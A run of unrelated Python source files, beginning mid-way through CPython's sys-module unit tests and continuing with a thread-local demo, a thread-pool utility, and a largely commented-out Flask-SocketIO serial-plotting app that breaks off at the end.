self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_main_invalid_unicode(self):
import locale
non_decodable = b"\xff"
encoding = locale.getpreferredencoding()
try:
non_decodable.decode(encoding)
except UnicodeDecodeError:
pass
else:
self.skipTest('%r is decodable with encoding %s'
% (non_decodable, encoding))
code = b'print("' + non_decodable + b'")'
p = subprocess.Popen([sys.executable, "-c", code], stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertTrue(b"UnicodeEncodeError:" in stderr,
"%r not in %s" % (b"UnicodeEncodeError:", ascii(stderr)))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "division_warning",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read()
self.assertEqual(out, "\xa2\n".encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, b'?')
def test_executable(self):
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
vh = self.vheader
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), size(vh + 'PP') + gc_header_size)
def test_default(self):
h = self.header
vh = self.vheader
size = self.calcsize
self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size(vh) + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(vh) + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size(h + 'P'))
# code
check(get_cell().__code__, size(h + '5i8Pi2P'))
# complex
check(complex(0,1), size(h + '2d'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.keys(), size(h + 'P'))
# dictionary-valueiterator
check({}.values(), size(h + 'P'))
# dictionary-itemiterator
check({}.items(), size(h + 'P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# BaseException
check(BaseException(), size(h + '5P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size(h + '5P 2P2PP'))
# UnicodeDecodeError
# XXX
# check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size(h + '5P 2P2PP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# reverse
check(reversed(''), size(h + 'PP'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '11P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0, size(vh))
check(1, size(vh) + self.longdigit)
check(-1, size(vh) + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), size(vh) + 2*self.longdigit)
check(int(PyLong_BASE**2-1), size(vh) + 2*self.longdigit)
check(int(PyLong_BASE**2), size(vh) + 3*self.longdigit)
# memory
check(memoryview(b''), size(h + 'P PP2P2i7P'))
# module
check(unittest, size(h + '3P'))
# None
check(None, size(h + ''))
# NotImplementedType
check(NotImplemented, size(h))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# range
check(range(1), size(h + '3P'))
check(range(66000), size(h + '3P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(0), size(h + '3P'))
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('16Pi17P 3P 10P 2P 2P')
check(int, s)
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# unicode
usize = len('\0'.encode('unicode-internal'))
samples = ['', '1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
basicsize = size(h + 'PPliP') + usize * (len(s) + 1)
check(s, basicsize)
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_getfilesystemencoding(self):
import codecs
def check_fsencoding(fs_encoding):
if sys.platform == 'darwin':
self.assertEqual(fs_encoding, 'utf-8')
elif fs_encoding is None:
return
codecs.lookup(fs_encoding)
fs_encoding = sys.getfilesystemencoding()
check_fsencoding(fs_encoding)
# Even in C locale
try:
sys.executable.encode('ascii')
except UnicodeEncodeError:
# Python doesn't start with ASCII locale if its path is not ASCII,
# see issue #8611
pass
else:
env = os.environ.copy()
env['LANG'] = 'C'
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print(sys.getfilesystemencoding())"],
env=env)
fs_encoding = output.rstrip().decode('ascii')
check_fsencoding(fs_encoding)
def test_setfilesystemencoding(self):
old = sys.getfilesystemencoding()
try:
sys.setfilesystemencoding("iso-8859-1")
self.assertEqual(sys.getfilesystemencoding(), "iso-8859-1")
finally:
sys.setfilesystemencoding(old)
try:
self.assertRaises(LookupError, sys.setfilesystemencoding, "xxx")
finally:
sys.setfilesystemencoding(old)
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
myThreadLocal.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import threading
#print(dir(threading))
thread_local = threading.local()
def process_student():
std = thread_local.student
print('Hello,%s(in %s)' % (std,threading.current_thread().name))
def add_local(name):
thread_local.student = name
process_student()
t1 = threading.Thread(target=add_local,args=('Winston',),name='Thread1')
t2 = threading.Thread(target=add_local,args=('gerald',),name='Thread2')
t1.start()
t2.start()
t1.join()
t2.join() |
thread_pool.py | #!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: Provide some useful thread utils
Created: 2016/10/29
"""
import unittest
#import multiprocessing
from pprint import pprint
from time import sleep
try:
from Queue import Full, Empty, Queue
except:
from queue import Full, Empty, Queue
#from random import choice
#from traceback import format_exc
from threading import Thread, Lock
#from multiprocessing import Process, Lock
from uuid import uuid1
########################################################################
class TaskError(Exception):
""""""
pass
########################################################################
class LaborThread(Thread):
""""""
#----------------------------------------------------------------------
def __init__(self, result_queue, master, clean_mod=True, *args, **kargs):
"""Constructor"""
Thread.__init__(self, name='ThreadPool-Labor-'+uuid1().hex,
*args, **kargs)
self._master = master
self._clean_mod = clean_mod
self._result_queue = result_queue
self._startworkingflag_ = True
self._task_queue = Queue(1)
self._count_lock = Lock()
#----------------------------------------------------------------------
def get_result_queue(self):
""""""
return self._result_queue
#----------------------------------------------------------------------
def get_task_queue(self):
""""""
return self._task_queue
#----------------------------------------------------------------------
def feed(self, function, *vargs, **kwargs):
""""""
try:
self._task_queue.put_nowait(tuple([function, vargs, kwargs]))
return True
except Full:
#format_exc()
return False
#----------------------------------------------------------------------
def run(self):
""""""
while self._startworkingflag_:
#pprint('Running')
try:
_task = self._task_queue.get(timeout=3)
result = {}
result['from'] = self.name
result['state'] = False
result['result'] = None
result['current_task'] = _task.__str__()
result['exception'] = tuple()
try:
ret = self._process_task(_task)
result['state'] = True
result['result'] = ret
#self._result_queue.put(result)
except Exception as e:
result['state'] = False
result['result'] = None
exception_i = (str(type(e)), str(e))
result['exception'] = exception_i
finally:
if self._clean_mod:
_result = {}
_result['state'] = result['state']
_result['result'] = result['result']
result = _result
self._result_queue.put(result)
self._count_lock.acquire()
self._master._executed_task_count = \
self._master._executed_task_count + 1
self._count_lock.release()
except Empty:
pass
#----------------------------------------------------------------------
def _process_task(self, task):
""""""
try:
ret = task[0](*task[1], **task[2])
return ret
except Exception as e:
raise e
#----------------------------------------------------------------------
def stop(self):
""""""
#self.stop()
self._startworkingflag_ = False
#----------------------------------------------------------------------
def __del__(self):
""""""
self.stop()
#----------------------------------------------------------------------
def _exception_process(self):
""""""
########################################################################
class Pool(object):
""""""
#----------------------------------------------------------------------
def __init__(self, thread_max=30, clean_mod=True):
"""Constructor"""
self.thread_max = thread_max
self._current_thread = []
self._daemon_thread = []
self._clean_mod = clean_mod
self._result_queue = Queue()
self._task_queue = Queue()
self.is_alive = True
self._executed_task_count = 0
self._task_count = 0
#----------------------------------------------------------------------
def _restart_thread_daemon(self):
""""""
#pprint('threads daemon started!')
while self.is_alive:
if len(self._current_thread) < self.thread_max:
self._start_new_labor()
else:
sleep(0.5)
#----------------------------------------------------------------------
def _start_new_labor(self):
""""""
#pprint('start new labor')
_tmp_labor = LaborThread(result_queue=self._result_queue, master=self,
clean_mod=self._clean_mod)
_tmp_labor.daemon = True
_tmp_labor.start()
self._current_thread.append(_tmp_labor)
#----------------------------------------------------------------------
def feed(self, target_func, *vargs, **kwargs):
""""""
self._task_queue.put(tuple([target_func, vargs, kwargs]))
self._task_count = self._task_count + 1
#----------------------------------------------------------------------
def _dispatcher(self):
""""""
#pprint('dispatcher start!')
while self.is_alive:
try:
ret = self._task_queue.get()
while True:
availible_threads = [None if x.get_task_queue().full() \
else x for x in self._current_thread]
for i in availible_threads:
if i == None:
pass
else:
i.feed(ret[0], *ret[1], **ret[2])
ret = None
break
if ret == None:
break
else:
continue
except Empty:
sleep(seconds=0.5)
#----------------------------------------------------------------------
def stop(self):
""""""
for i in self._current_thread:
i.stop()
del i
self.is_alive = False
#----------------------------------------------------------------------
def start(self):
""""""
self.is_alive = True
_ = Thread(name='restart_labor_daemon', target=self._restart_thread_daemon)
_.daemon = True
_.start()
self._daemon_thread.append(_)
_ = Thread(name='dispatcher_daemon', target=self._dispatcher)
_.daemon = True
_.start()
#----------------------------------------------------------------------
def get_result_queue(self):
""""""
return self._result_queue
#----------------------------------------------------------------------
def get_task_queue(self):
""""""
return self._task_queue
#----------------------------------------------------------------------
def get_result_generator(self):
""""""
while True:
try:
ret = self._result_queue.get(timeout=1)
yield ret
except Empty:
if self._task_count == self._executed_task_count:
break
else:
pass
#----------------------------------------------------------------------
@property
def task_count(self):
"""The amount of tasks"""
return self._task_count
#----------------------------------------------------------------------
@property
def executed_task_count(self):
""""""
return self._executed_task_count
#----------------------------------------------------------------------
@property
def percent(self):
""""""
return float(self._executed_task_count)/float(self._task_count)
########################################################################
class PoolTest(unittest.case.TestCase):
""""""
#----------------------------------------------------------------------
def runTest(self):
"""Constructor"""
self.test_laborprocess()
#----------------------------------------------------------------------
def test_pool(self):
""""""
def func1(arg1):
print('func1 called!')
return arg1
pool = Pool()
pool.start()
pool.feed(func1, 12345)
for i in range(10):
pool.feed(func1, i)
sleep(3)
while True:
try:
pprint(pool.get_result_queue().get(timeout=5))
except Empty:
break
pool.stop()
if __name__ == "__main__":
unittest.main()
|
main.py | from flask import Flask, render_template, session, request, make_response, json, jsonify, url_for
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
import glob
# import json
import math
import numpy as np
import os
import pyaudio
from random import randint
from threading import Thread, Lock
import time
import serial
import sys
import struct
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #Version 2.7 or Above?
# if sys.version_info[0] >2:
# version3 = True
# kwargs = {'newline':''}
# else:
# version3 = False
# kwargs = {}
# serialConnected = False #global flag for whether or not the serial port should be connected
# serialPort = 0 # (init value is 3...junk) contains serial port object when in use...touching protected by serialLock below
# serialLock = Lock() #serial permission lock (protects shared resource of serial port)
# print (serialLock)
# #Taken from here on StackExchange: http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
# #Want to give credit where credit is due!
# def serial_ports():
# if sys.platform.startswith('win'):
# ports = ['COM%s' % (i + 1) for i in list(range(256))]
# elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# # this excludes your current terminal "/dev/tty"
# ports = glob.glob('/dev/tty[A-Za-z]*')
# elif sys.platform.startswith('darwin'):
# ports = glob.glob('/dev/tty.*')
# else:
# raise EnvironmentError('Unsupported platform')
# result = []
# for port in ports:
# try:
# #print("checking port "+port)
# s = serial.Serial(port)
# #print("closing port "+port)
# s.close()
# result.append(port)
# except (OSError, serial.SerialException):
# pass
# return result
# #serial variables:
# serialselection = ''
# baudselection = 115200
# mcuMessage = []
# '''system_parameters (dictionary where keys are user-variable parameters and entry is list consisting of current value (index 0 and single-character comm term for conveying value back to micro...for example you could have system_parameters['K_d']=[1.4,'D']
# '''
# system_parameters = {}
# #params_and_values an ordered list of the names of paramters, headroom, and values to be plotted
# #Used in generating CSV header list in order
# params_and_values = []
# #A list pointing to parameter values for quick plotting (rather than list comprehend this every time
# param_vals = []
# command_terms = ['HIHI']
# #expected_length...how long each full message from Micro should be
# expected_length = 0
# #function that will be stored for chopping up message into appropriate signed/unsignedness/float, etc... makes this processing arbitrarily expandable as needed...must obviously agree with encoding scheme on micro
# parseFunction = lambda x: [0]
# '''Kp = 0.0
# Kd = 0.0
# Ki = 0.0
# direct = 0.0
# desired = 0.0
# '''
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##
#####################################
## ##
## Stuff from original files ##
## ##
#####################################
# keepRunning = True #set to True for default
# #global setup variables:
# #used during initialization of comms/building GUI
# isSetup = False
# setupString = ""
# allGoodFromGUI = False
# #Function run in parallel on infinite loop with
# #serves as serial listener outside of separate loop
# def serialThread():
# print ("Starting serial background thread.")
# global desired
# global serialLock
# global csvLock
# global serialPort
# global system_parameters
# global params_and_values
# global expected_length
# global parseFunction
# global param_vals
# global csv_default
# global csv_recent
# global alt_data
# global alternate
# global isSetup
# global setupString
# global command_terms
# while True:
# #print (serialConnected)
# if serialConnected:
# print("serial connected!")
# print("not setup")
# writeUpdates('~',0)
# time.sleep(2.0)
# serialLock.acquire()
# try:
# new_setupString = serialPort.readline()
# serialPort.flushInput()
# except:
# print ("initi string reading issue")
# serialLock.release()
# print("before")
# print(new_setupString)
# # what the heck is happening here?
# new_setupString = strip_until_marker(new_setupString)
# print("after")
# print(new_setupString)
# temp_commands = new_setupString.split('&')
# temp_commands = temp_commands[1:-1]
# print(temp_commands)
# print(command_terms)
# if temp_commands != command_terms: #only reload the gui if the configuration setup string has changed!
# command_terms = temp_commands
# print("DETECTED DIFFERENT STARTUP STRING!")
# setupString = new_setupString
# print(setupString)
# temp = setupString.split('&',1)[1]
# temp = temp.rsplit('&',1)[0]
# setupString = temp
# print(setupString)
# try:#send up to javascript to sort its part out
# socketio.emit('startup',setupString,broadcast =True)
# except:
# print ("failed socket")
# #build structures based on setupString's contents and orderj
# plot_count =0 #used for tallying plots
# spaces = [] #used for determining how to chop data string (bytes per var)
# s=[] #list of sliders
# t=[] #list of temporal plots
# h = [] #contains headroom value if that is being plotted
# for x in command_terms:
# if len(x)>0 and x[0] =='S': #is a slider
# print("slider")
# slider_vals = x.split('~') #chop string
# print(slider_vals)
# #next: add key to system_parameters dict of slider name
# #entry is starting val (0) and one char value used for comms
# system_parameters[slider_vals[1]]=[0,slider_vals[2]]
# s.append(slider_vals[1]) #add name of param to s list
# #next is to fill in the param_vals list with the current value
# param_vals.append(system_parameters[slider_vals[1]][0])
# if len(x)>0 and x[0] == 'A': #we are alternating
# vals = x.split('~') #split substring
# alt_data['period'] = float(vals[2]) #period unpacked
# alt_data['param'] = vals[1] #link alternate to selected parameter
# if len(x)>0 and x[0]=='T': #we have a temporal plot
# print("Plot")
# plot_vals = x.split('~') #split substring
# t.append(plot_vals[1]) #add name to t list
# #next line: append list: [num_bytes,signed/unsigned/float,etc..]
# print(plot_vals)
# spaces.append([int(plot_vals[2][1]),plot_vals[2][0]])
# plot_count +=1 #increment plot count
# if len(x)>0 and x[0]=='H':
# head_vals = x.split('~')
# h.append("Headroom")
# plot_count +=1 #headroom isn't a "plot" but treated same
# if head_vals[1] =='2':
# spaces.append([2,'S']) #needed since 16bit int on Arduino
# elif head_vals[1] =='4':
# spaces.append([4,'F']) #needed since ARM32 Teensy
# params_and_values = t+h+s #in order plots, headroom, sliders
# print("Identified values: %r" %(params_and_values))
# expected_length = sum(x[0] for x in spaces)+2 #2 from open/closing byte
# #parse_prototype is function that will chop up incoming bytes for sending up to the GUI
# def parse_prototype(listo):
# new_out = []
# current_index=1 #start 1 up because of start byte
# #print(listo)
# for x in range(plot_count):
# val = 0
# if spaces[x][0] == 1:
# if spaces[x][1] == 'S':
# val = struct.unpack('b',listo[current_index:current_index+1])[0]
# elif spaces[x][1] =='U':
# val = struct.unpack('B',listo[current_index:current_index+1])[0]
# elif spaces[x][0] == 2:
# if spaces[x][1] == 'S':
# val = struct.unpack('<h',listo[current_index:current_index+2])[0]
# elif spaces[x][1] == 'U':
# val = struct.unpack('H',listo[current_index:current_index+2])[0]
# elif spaces[x][0] == 4:
# if spaces[x][1] == 'F':
# val = struct.unpack('f',listo[current_index:current_index+4])[0]
# elif spaces[x][1] == 'S':
# val = struct.unpack('i',listo[current_index:current_index+4])[0]
# new_out.append(val)
# current_index += spaces[x][0]
# return new_out
# parseFunction = parse_prototype
# while not allGoodFromGUI:
# print("Waiting for GUI Setup...")
# time.sleep(1.0)
# isSetup = True
# else:
# print("SAME AS BEFORE!")
# inform_dev() #just tell device that we are good
# serialLock.acquire()
# try:
# serialPort.flushInput()
# except:
# print ("initi string reading issue")
# serialLock.release()
# print("updating Parameters:")
# for x in s: #reload gui and device
# socketio.emit('setup slider',{0:x,1:str(system_parameters[x][0])}, broadcast=True)
# print("Writing %s to be %0.4f" %(system_parameters[x][1],system_parameters[x][0]))
# writeUpdates(system_parameters[x][1],system_parameters[x][0])
# time.sleep(0.1)
# writeUpdates(system_parameters[x][1],system_parameters[x][0])
# time.sleep(0.1)
# time.sleep(1)
# print(system_parameters)
# print ("Starting to read serial subthread")
# print ('Alternating state')
# print (alternate)
# print("expected length:")
# print (expected_length)
# print (serialConnected)
# while serialConnected:
# serialLock.acquire()
# b = serialPort.read(expected_length)
# if len(b) != expected_length:
# print("expected=%d, actual=%d\n",len(b),expected_length)
# new_data = None
# if len(b) > 0 and messageRead(b,expected_length):
# new_data = parseFunction(b)
# if new_data != None:
# try:
# socketio.emit('note',new_data,broadcast =True)
# except:
# print ("failed socket")
# if csv_yn:
# temp_time = [time.time()-csv_st] #time since recording started
# csvLock.acquire()
# newb_list = temp_time+new_data+[system_parameters[x][0] for x in s]
# csv_default.writerow(newb_list)
# csv_recent.writerow(newb_list)
# csvLock.release()
# serialLock.release()
# time.sleep(0.01)
# if alternate == 1:
# if time.time()-alt_data['timer'] > alt_data['period']:
# print ('Switch to :')
# alt_data['timer'] = time.time() #reset timer
# poi = alt_data['param'] #param of interest
# print(type(system_parameters[poi][0]))
# print(system_parameters[poi][0])
# system_parameters[poi][0] = system_parameters[poi][0]*-1.0
# alt_data['state'] = alt_data.get('state')*-1
# writeUpdates(system_parameters[poi][1],system_parameters[poi][0])
# try:
# socketio.emit('state toggle', system_parameters[poi][0], broadcast=True) #tell the GUI that the desired has changed
# except:
# print('failed toggle socket')
# print ("Stopping serial read. Returning to idle state")
# time.sleep(0.01)
# def strip_until_marker(input_string):
# #return only text after last non-ascii character has been found
# #should *always* work...closing byte of plot package is \xff which is non-ascii and
# #should get caught in this scheme...there are of course ways to break this but they
# #require breaking the communication contract we have setup.
# new_string = ''
# for x in range(len(input_string)):
# poss = input_string[x:x+1]
# try:
# if version3:
# if type(poss)==type("hi"):
# poss = str.encode(poss,'ascii') #fail here possibly
# char = poss.decode('ascii')
# new_string+=char
# except:
# new_string=""
# return new_string
# #runtime variables...
# def messageRead(buff,exp):
# first = struct.unpack('b',buff[0:1])[0]
# last = struct.unpack('b',buff[exp-1:exp])[0]
# if first == 0 and last == -1:
# return True
# else:
# return False
# # User has connected
# @socketio.on('connect')
# def test_connect():
# print ('hey someone connected!' )
# ports = serial_ports() #generate list of currently connected serial ports
# print (ports)
# newb=[]
# for p in ports:
# newb.append({"comName": p})
# print (json.dumps(newb))
# #emit('serial list display', {'data': ports}) #emit socket with serial ports in it
# emit('serial list display', newb) #emit socket with serial ports in it
# #emit('my response', {'data': 'Connected'})
# # User has disconnected
# @socketio.on('disconnect')
# def test_disconnect():
# global csv_yn
# global csvLock
# emit('serial disconnect request',broadcast=True)
# csv_yn = 0
# #if current is not None and archive is not None:
# csvLock.acquire()
# try:
# current.close()
# archive.close()
# except NameError:
# pass #if didn't exist yet, don't try...
# csvLock.release()
# print('Client disconnected. Hopefully that was for the best.')
# writeUpdates('~',0)#for non-autoreset devices must tell it to enter child state again
# # Something
# def writeUpdates(tag,val):
# global serialPort
# global serialLock
# string_to_write = tag+' %0.2f\n' %(float(val))
# print(string_to_write)
# if serialConnected:
# serialLock.acquire() #claim serial resource
# if version3:
# b = bytes(string_to_write,'UTF-8')
# print(b)
# serialPort.write(bytes(string_to_write,'UTF-8'))
# else:
# serialPort.write(string_to_write.encode('utf-8'))
# #serialPort.write(string_to_write)
# serialLock.release() #release serial resource back out into big scary world
# else:
# print ("Change in %s to value %s not written since no live serial comm exists yet" %(tag,val))
# # Specs
# @socketio.on('serial select')
# def action(port):
# global serialselection
# print ('serial port changed to %s' %(port))
# serialselection = port
# @socketio.on('baud select')
# def action(baud):
# global baudselection
# print ('baud changed to %s' %(baud))
# baudselection = baud
# @socketio.on('serial connect request')
# def connection(already_built):
# global serialConnected
# global serialPort
# global serialLock
# global alternate
# global isSetup
# already_built = eval(str(already_built))
# print("state of gui")
# print(already_built)
# isSetup = already_built['state'] #user this
# print(isSetup)
# alternate = 0
# print ('Trying to connect to: ' + serialselection + ' ' + str(baudselection))
# print (serialLock)
# print (serialConnected)
# try:
# serialLock.acquire()
# print ("Lock acquired")
# serialPort = serial.Serial(serialselection, int(baudselection),timeout=4)
# print ('SerialPort')
# print ('Connected to ' + str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
# emit('serial connected', broadcast=True) #tells page to indicate connection (in button)
# serialPort.flushInput()
# serialLock.release()
# serialConnected = True #set global flag
# except:
# print ("Failed to connect with "+str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
# @socketio.on('serial disconnect request')
# def discon():
# global serialConnected
# global serialLock
# global serialPort
# print ('Trying to disconnect...')
# serialLock.acquire()
# serialPort.close()
# serialLock.release()
# serialConnected = False
# emit('serial disconnected',broadcast=True)
# print ('Disconnected...good riddance' )
# @socketio.on('disconnected')
# def ending_it():
